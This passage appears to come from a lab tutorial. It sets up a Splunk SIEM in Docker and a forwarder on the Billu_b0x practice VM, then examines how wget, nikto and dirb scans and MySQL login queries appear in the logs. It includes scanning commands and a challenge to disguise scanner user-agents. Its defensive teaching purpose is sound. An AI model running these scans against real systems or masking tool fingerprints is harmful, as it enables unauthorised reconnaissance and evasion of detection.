4.  After pulling the image we are going to run it.  However, prior to doing that: Splunk uses port 8000 for the web interface and also needs port 9997 for a splunk forwarder (agent) to send logs to the server.  (The ports can be changed.)  With the docker image running on Kali, the image will receive a 172.17.0.2 IP Address by default.  Billu_b0x will be in a virtual machine that will not have access to that IP Address unless we associate the ports with the IP Address of Kali.  To do that, use the -p command line switch to indicate the IP Address you want to bind to and the listening port on that IP Address, forwarded to the port on the image.

Command: docker run -it -p 172.16.216.130:8000:8000 -p 172.16.216.130:9997:9997 splunk/splunk


5.  When the image loads it will have you agree to the End-User License Agreement.  After it completes loading then it will display a blinking cursor.  Use the key combination of Ctrl <p> <q> to exit out of the image while leaving it running.

6.  Because we associated the Splunk web interface with an IP Address that the host of my Kali VM can reach, let's navigate to the splunk login page on port 8000.  (You should change the password, but remember that, being a docker image, you will lose everything when you kill the instance of the image.)

URL: http://172.16.216.130:8000



7.  Then setup a receiver to listen on port 9997.  Click settings in the top right, then select forwarding and receiving.  Then click add new to receive data.  Insert port 9997 for the default port.



8.  Now, we need to load the Billu_b0x VM.  If you do not know the root password, go back and work through the VM and figure out the password.  Go ahead and login to the console and start the SSH server.

Command: /etc/init.d/ssh start

9.  Connect to the VM from the host through SSH.  This will simplify the configuration.

Command: ssh root@172.16.216.129

10.  Download the "Universal Splunk Forwarder" to the host.  This VM requires the 32 bit deb package.  After you download the file, similar to this, splunkforwarder-7.0.0-c8a78efdd40f-linux-2.6-intel.deb, copy this over to the Billu_b0x VM.

11. In a new terminal window, let's copy the file over to the VM.  To do this you can use WinSCP on windows or scp on Linux.  I am going to demonstrate using scp. 

Command:  scp splunkforwarder-7.0.0-c8a78efdd40f-linux-2.6-intel.deb root@172.16.216.129:/root

Walking through the command, secure copy the file by using the account of root to the IP Address listed and place the file in the /root directory.

12.  Then go back to the SSH session you established in step 9 and install the splunk forwarder.

Command:  dpkg -i splunkforwarder-7.0.0-c8a78efdd40f-linux-2.6-intel.deb

13.  Now that the forwarder is installed, we need to configure it to send logs to 172.16.216.130:9997, the Kali box on port 9997, which then forwards them to the docker image of splunk.

Command: /opt/splunkforwarder/bin/splunk add forward-server 172.16.216.130:9997


14. Verify the forward-server is configured.

Command: /opt/splunkforwarder/bin/splunk list forward-server

You should see it listed under inactive forwarders.  Don't worry about this yet.

15.  Now you need to add the files or directories you would like to send to Splunk.  The main reason you want to send your logs to a SIEM or central location is that a miscreant may tamper with them or delete them on the box.

16.  Let's add the logs for the apache2 server for the access.log and the error.log.

Command:  /opt/splunkforwarder/bin/splunk add monitor /var/log/apache2/access.log

Command: /opt/splunkforwarder/bin/splunk add monitor /var/log/apache2/error.log



17.  Now that we have configured the forwarder to send logs to the server and what logs to send to the server, let's start the splunk forwarder.

Command:  /opt/splunkforwarder/bin/splunk start splunkd


18.  After this is started you may have to wait about 2-5 minutes but then navigate in Splunk to the search box.  In the search query, type index=main and search for the last 24 hours.  You should see the logs.

19.  To generate some logs I created a simple script to get the home page of Billu-b0x every tenth of a second, up to 2000 times.  I ran the script from the host.
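The script itself is not shown here, but a rough Python equivalent of that loop might look like the following; it shells out to wget so the user-agent discussed in the next steps stays the same.

#!/usr/bin/python
# Rough sketch: request the Billu_b0x home page every tenth of a second,
# up to 2000 times, to generate apache2 access.log entries.
import subprocess
import time

for i in range(2000):
 subprocess.call(["wget", "-q", "-O", "/dev/null", "http://172.16.216.129/"])
 time.sleep(0.1)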



20.  If all is setup correctly, click splunk in the top-left, click app search and reporting, then in the new search insert "index=main".  You should see the logs coming in, indicating the host is "indishell".


21.  Notice that the wget tool will identify itself in what is called the user-agent.  The user-agent will describe the tool, browser, operating system and other plugins associated with the connecting device to a web server.

22.  With the tool wget you can control the user-agent that is passed.  In the terminal window I specified the user-agent to be "Hello!", then executed it.  I searched the logs and found the log entry that I caused with the tool.
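The exact command is not shown here, but with wget the user-agent is set with the --user-agent (or -U) option, for example:

Command: wget -q -O /dev/null --user-agent="Hello!" http://172.16.216.129/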


23.  As a penetration tester you should understand what your tools look like in the logs.  As defenders you should know about what these tools produce and should look through logs for anomalies or unique user-agents to detect interesting activity.

24.  In the Billu b0x walk through we used nikto and dirb.  Below I am going to run both tools and we are going to look at the logs to see what is produced from the tools.

Command: nikto -h 172.16.216.129
Command: dirb http://172.16.216.129 /usr/share/wordlists/dirb/big.txt 


Before... 2,002 logs recorded


After nikto... 18,414 logs recorded (Observe the user-agent)



After dirb... 89,683 logs recorded (Observe the user-agent)



Challenge: Can you change the user-agent that is passed with nikto or dirb?

Challenge: Use Splunk to search the logs.  Try and find HTTP code 200 or web sites that exist that were accessed by Nikto or dirb.

25.  Now we are going to setup MySQL to log queries to a file and setup the splunk forwarder to collect those logs.  Login as root to Billu b0x and change to /etc/mysql and modify the my.cnf file.

Command: cd /etc/mysql
Command: vim my.cnf


26.  Scroll-down in the file to the section on "Logging and Replication".  Remove the comment or the "#" in front of "general_log_file" and "general_log".  Then save and exit from vim "<esc> :wq".


27.  Now add the file "/var/log/mysql/mysql.log" to the splunk files to be monitored, also add the error.log.

Command: /opt/splunkforwarder/bin/splunk add monitor /var/log/mysql/mysql.log

Command: /opt/splunkforwarder/bin/splunk add monitor /var/log/mysql/error.log



28.  After configuring the logging of mysql, attempt to login then use splunk to view the query to the database of the username and password.  Notice the search is specific to the mysqld log.

Search: index=main sourcetype=mysqld


29.  The query is logged, and now the username and password for the user are in the logs.  Working with a SIEM, you need to understand what is in the logs.  Another example is when a query contains an SSN or a credit card number.  Be aware of when this information could be gathered by a SIEM.

Developers can return sensitive information as query results, but should be careful about querying for it directly with user-supplied values.  For example, instead of putting the password the user typed into the query itself, you can query for the stored password of the admin user, then compare the user's input with the returned password and verify they match.  That is after you check that the user exists in the database.
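As a hedged illustration of that idea (the users table and its columns are hypothetical, and sqlite3 stands in for whatever database the application uses), the lookup can be done with a parameterized query and the comparison done in application code, so the user-supplied password never appears in the query text that ends up in the logs.

#!/usr/bin/python
# Sketch: fetch the stored password for a username with a parameterized
# query, then compare in code instead of embedding the user's input in SQL.
import sqlite3

def check_login(db_path, username, supplied_password):
 conn = sqlite3.connect(db_path)
 row = conn.execute("SELECT password FROM users WHERE username = ?",
                    (username,)).fetchone()
 conn.close()
 if row is None:
  return False  # user does not exist
 return row[0] == supplied_password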

30.  As an ethical hacker or a penetration tester you may want to test your attack in a lab prior to performing it.  I also like to test for vulnerabilities with a proxy and logging enabled.  This helps me to analyze my attacks and how I have to change them to be more effective.

Challenge:  Continue working through the Billu b0x walk through.  Use burp suite and see if you can see in the logs that you are using it as a proxy.



